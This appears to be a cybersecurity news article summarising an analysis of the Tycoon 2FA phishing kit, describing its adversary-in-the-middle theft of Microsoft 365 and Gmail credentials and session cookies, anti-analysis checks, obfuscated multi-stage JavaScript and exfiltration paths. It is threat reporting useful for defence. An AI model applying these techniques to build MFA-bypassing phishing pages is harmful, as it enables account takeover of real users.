The Tycoon 2FA phishing kit has emerged as one of the most sophisticated Phishing-as-a-Service platforms since its debut in August 2023, specifically engineered to circumvent two-factor authentication and multi-factor authentication protections on Microsoft 365 and Gmail accounts.
This advanced threat employs an Adversary-in-the-Middle approach, utilizing reverse proxy servers to host convincing phishing pages that perfectly replicate legitimate login interfaces while capturing user credentials and session cookies in real-time.
According to the Any.run malware trends tracker, Tycoon 2FA leads with over 64,000 reported incidents this year, making it one of the most prevalent phishing threats in the current landscape.
The attack spreads through multiple distribution vectors including malicious PDF documents, SVG files, PowerPoint presentations, and emails containing phishing links.
Threat actors have also leveraged cloud storage platforms such as Amazon S3 buckets, Canva, and Dropbox to host fake login pages, making detection more challenging for traditional security solutions.
What makes this campaign particularly dangerous is its ability to steal authentication codes even when two-factor authentication is enabled, effectively rendering this security measure useless against the sophisticated interception techniques employed by the kit.
Cybereason analysts identified that the phishing kit implements multiple pre-redirection checks as defense mechanisms against detection, including domain verification, CAPTCHA challenges, bot and scanning tool detection, and debugger checks that actively look for security researchers analyzing the code.
These checks ensure that only genuine victims reach the final phishing page while automated security tools and analysts are redirected to benign websites.
The kit also demonstrates an advanced understanding of organizational security policies by analyzing error messages from login attempts, allowing attackers to tailor their campaigns for maximum effectiveness.
The technical sophistication extends to the use of boilerplate templates that dynamically generate fake login pages based on actual responses from Microsoft servers, creating a seamless experience that prompts users to input their MFA codes, which are then relayed to legitimate servers in real-time, successfully bypassing this critical security layer.
Multi-Stage JavaScript Execution and Credential Harvesting
The attack unfolds through a complex multi-stage JavaScript execution chain designed to evade detection while harvesting credentials.
.webp "Attack Techniques of Tycoon 2FA Phishing Kit Targeting Microsoft 365 and Gmail Accounts Detailed 3")
The initial HTML page contains a JavaScript file with a base64-encoded payload compressed using the LZ-string algorithm, which decompresses and executes the hidden payload in memory.
The second stage employs a technique called DOM Vanishing Act, where malicious JavaScript code removes itself from the Document Object Model after execution, leaving no visible trace for security tools inspecting the page code.
The script contains three different base64-encoded payloads, each designed to run under specific conditions.
The first payload uses XOR cipher obfuscation and executes only when window.location.pathname.split contains an exclamation mark or dollar sign, confirming that the user arrived via the intended malicious link rather than through automated scanning.
.webp "Attack Techniques of Tycoon 2FA Phishing Kit Targeting Microsoft 365 and Gmail Accounts Detailed 4")
The email extraction process creates a custom string by appending “WQ” to the victim’s email address before exfiltrating it to the command-and-control server via POST request to /zcYbH5gqRHbzSQXiK8YtTbhpNSGtkZc6xbMyRBGazbWU8fjfq, where the server responds with AES-encrypted payloads decrypted using the CryptoJS library.
When victims enter credentials into the fake login page, the attacker acting as a middleman immediately receives the information and submits it to legitimate Microsoft servers.
The victim’s webpage is then dynamically updated based on server responses using webparts, making the phishing attempt appear seamless and highly convincing.
The final JavaScript payload collects browser information including navigator.userAgent and sends requests to geolocation services, encrypting the gathered data with a hardcoded key before transmission to the attacker’s endpoint at /tdwsch3h8IoKcUOkog9d14CkjDcaR0ZrKSA95UaVbbMPZdxe, successfully completing the credential theft operation.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
